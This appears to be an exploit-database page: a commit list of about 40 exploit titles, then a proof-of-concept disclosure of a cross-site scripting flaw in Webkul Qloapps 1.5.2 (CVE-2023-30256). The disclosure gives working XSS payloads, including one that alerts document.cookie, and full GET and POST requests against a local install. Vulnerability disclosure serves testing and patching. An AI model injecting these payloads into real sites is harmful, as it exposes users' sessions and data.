0a7adaa3fc
40 changes to exploits/shellcodes/ghdb Optoma 1080PSTX Firmware C02 - Authentication Bypass Screen SFT DAB 600/C - Authentication Bypass Account Creation Screen SFT DAB 600/C - Authentication Bypass Admin Password Change Screen SFT DAB 600/C - Authentication Bypass Erase Account Screen SFT DAB 600/C - Authentication Bypass Password Change Screen SFT DAB 600/C - Authentication Bypass Reset Board Config Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) PnPSCADA v2.x - Unauthenticated PostgreSQL Injection Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution Yank Note v3.52.1 (Electron) - Arbitrary Code Execution Apache Superset 2.0.0 - Authentication Bypass FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) Affiliate Me Version 5.0.1 - SQL Injection Best POS Management System v1.0 - Unauthenticated Remote Code Execution Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) e107 v2.3.2 - Reflected XSS File Thingie 2.5.7 - Remote Code Execution (RCE) GetSimple CMS v3.3.16 - Remote Code Execution (RCE) LeadPro CRM v1.0 - SQL Injection PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS) Prestashop 8.0.4 - CSV injection Quicklancer v1.0 - SQL Injection SitemagicCMS 4.4.3 - Remote Code Execution (RCE) Smart School v1.0 - SQL Injection Stackposts Social Marketing Tool v1.0 - SQL Injection thrsrossi Millhouse-Project 1.414 - Remote Code Execution TinyWebGallery v2.5 - Remote Code Execution (RCE) WBiz Desk 1.2 - SQL Injection Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking MobileTrans 4.0.11 - Weak Service Privilege Escalation Trend Micro OfficeScan Client 10.0 - ACL Service LPE eScan Management Console 14.0.1400.2281 - Cross Site Scripting eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
45 lines
No EOL
1.7 KiB
Text
45 lines
No EOL
1.7 KiB
Text
# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
|
|
# Date: 15 May 2023
|
|
# Exploit Author: Astik Rawat (ahrixia)
|
|
# Vendor Homepage: https://qloapps.com/
|
|
# Software Link: https://github.com/webkul/hotelcommerce
|
|
# Version: 1.5.2
|
|
# Tested on: Kali Linux 2022.4
|
|
# CVE : CVE-2023-30256
|
|
|
|
|
|
Description:
|
|
|
|
A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.
|
|
|
|
Steps to exploit:
|
|
1) Go to Signin page on the system.
|
|
2) There are two parameters which can be exploited via XSS
|
|
- back
|
|
- email_create
|
|
|
|
2.1) Insert your payload in the "back"- GET and POST Request
|
|
Proof of concept (Poc):
|
|
The following payload will allow you to execute XSS -
|
|
|
|
Payload (Plain text):
|
|
xss onfocus=alert(1) autofocus= xss
|
|
|
|
Payload (URL Encoded):
|
|
xss%20onfocus%3dalert(1)%20autofocus%3d%20xss
|
|
|
|
Full GET Request (back):
|
|
[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]
|
|
|
|
2.2) Insert your payload in the "email_create" - POST Request Only
|
|
Proof of concept (Poc):
|
|
The following payload will allow you to execute XSS -
|
|
|
|
Payload (Plain text):
|
|
xss><img src=a onerror=alert(document.cookie)>xss
|
|
|
|
Payload (URL Encoded):
|
|
xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss
|
|
|
|
POST Request (email_create) (POST REQUEST DATA ONLY):
|
|
[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d] |